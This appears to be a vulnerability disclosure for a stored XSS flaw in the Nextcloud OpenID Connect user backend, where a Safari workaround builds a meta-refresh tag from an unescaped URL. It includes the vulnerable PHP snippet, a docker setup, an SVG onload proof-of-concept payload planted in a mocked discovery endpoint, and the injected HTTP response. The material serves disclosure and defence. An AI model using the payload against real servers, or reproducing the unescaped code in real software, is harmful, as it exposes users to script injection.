5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.0005 Low
EPSS
Percentile
16.4%
The OpenID Connect User Backend allows users to login to Nextcloud using SSO.
A workaround that was apparently implemented for the Safari browser enables stored Cross-Site-Scripting (XSS). The vulnerability only affects user agents that include “Safari” within their user agent string and is further limited by a restrictive Content-Security-Policy that is applied on the affected endpoint.
/var/www/html/custom_apps/user_oidc/lib/Controller/LoginController.php
// Workaround to avoid empty session on special conditions in Safari
// https://github.com/nextcloud/user_oidc/pull/358
if ($this->request->isUserAgent(['/Safari/']) && !$this->request->isUserAgent(['/Chrome/'])) {
return new Http\DataDisplayResponse('<meta http-equiv="refresh" content="0; url=' . $url . '" />');
}
$ docker run -p 8081:80 nextcloud:latest
user_oidc
module via http://localhost:8081/settings/apps/integration/user_oidcThe mocked discovery endpoint responds as follows:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[...]
{
"issuer":"http:\/\/idp.local:3000",
"authorization_endpoint":"'\" http-equiv=><svg\/onload=alert(document.domain)>",
[...]
}
authorization_endpoint
:HTTP/1.1 200 OK
Date: Wed, 31 Aug 2022 12:47:57 GMT
Server: Apache/2.4.54 (Debian)
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-XSS-Protection: 1; mode=block
X-Powered-By: PHP/8.0.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'
X-Request-Id: yUWr3aQshJ5OHyMuzG1j
Feature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'
Content-Disposition: inline; filename=""
Vary: Accept-Encoding
Content-Length: 492
Connection: close
Content-Type: text/html; charset=UTF-8
<meta http-equiv="refresh" content="0; url='" http-equiv=><svg/onload=alert(document.domain)>?client_id=test.local&response_type=code&scope=openid+email+profile&redirect_uri=http%3A%2F%2Flocalhost%3A8081%2Fapps%2Fuser_oidc%2Fcode&claims=%7B%22id_token%22%3A%7B%22email%22%3Anull%2C%22name%22%3Anull%2C%22quota%22%3Anull%7D%2C%22userinfo%22%3A%7B%22email%22%3Anull%2C%22name%22%3Anull%2C%22quota%22%3Anull%7D%7D&state=FB8IZL2JE55LJ1Y5HJAINPY6OTDQ16P1&nonce=356M5O3J1PKMRKJNBKE40RUGJA06O40E" />
The execution of JavaScript is prevented by the Content-Security-Policy
header:
{F1894250}
Stored XSS. The impact is limited due to the restrictive CSP that is applied on this endpoint.
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.0005 Low
EPSS
Percentile
16.4%